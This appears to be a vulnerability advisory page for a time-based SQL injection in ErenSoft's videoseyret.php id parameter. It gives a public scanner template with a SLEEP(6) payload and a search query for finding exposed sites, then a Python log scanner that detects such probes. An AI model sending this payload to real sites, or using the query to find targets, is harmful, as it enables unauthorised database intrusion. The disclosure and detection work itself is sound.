erensoft-sqli: ErenSoft - SQL Injection

Date: 2025-08-01 | Affected software: ErenSoft | PoC: public

Vulnerability description

SQL injection is an attack in which an attacker exploits a vulnerability in a web application's input fields to manipulate the application's SQL queries.

PoC code [public]

id: erensoft-sqli

info:
  name: ErenSoft - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
  reference:
    - https://cxsecurity.com/issue/WLB-2023070055
  metadata:
    verified: true
    max-request: 1
    google-query: intext:"Kodlama:Erensoft"
  tags: sqli,unauth,erensoft,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration >= 6
          - status_code == 200
          - contains(content_type, "text/html") && contains(body, "videoseyret")
        condition: and

      - type: word
        words:
          - class="entry-title"
# digest: 490a0046304402200cd0e377b4a725821564334c2b03d1345b1ae77ccfccf5d230ace6f2b2d5cc2b022004ae5efbe57fb13d19c04d05cd12afc68d2cc2da71041dab057ec8f9e2b57a21:922c64590222798bb761d5b6d8e72950
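
A defender-side counterpart to the template above, added here as an example (it is not part of the original template or of ErenSoft's code): it scans web-server access-log lines and flags requests to /videoseyret.php whose id parameter is not a plain integer, marking those that carry a time-delay function such as the template's SLEEP(6) probe. The combined log format, the integer-only id rule, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

TARGET_PATH = "/videoseyret.php"  # endpoint named in the template above
# Assumed log layout: Apache/nginx "combined" format.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" \d{3}')
# Delay primitives used by time-based SQL injection probes on common DBMSs.
DELAY_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I)
# Assumption: legitimate id values are plain decimal integers (the template uses 95).
NUMERIC_RE = re.compile(r"[0-9]+")


def classify(line):
    """Return (client, verdict, decoded_id) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if parts.path.lower() != TARGET_PATH:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        value = unquote(raw)  # second pass catches double-encoded payloads
        if NUMERIC_RE.fullmatch(value):
            continue
        verdict = "time-delay-sqli" if DELAY_RE.search(value) else "non-numeric-id"
        return client, verdict, value
    return None


def scan(lines):
    """Classify every line and keep only the suspicious hits."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /videoseyret.php?id=95 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Aug/2025:10:00:05 +0000] "GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Aug/2025:10:00:09 +0000] "GET /videoseyret.php?id=95%27 HTTP/1.1" 200 310',
    '198.51.100.4 - - [01/Aug/2025:10:00:12 +0000] "GET /index.php?id=sleep HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value}")
```

A hit in the access log shows only that the probe was sent; whether the server actually delayed its response has to be confirmed from response-time fields or database logs, if those are recorded.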
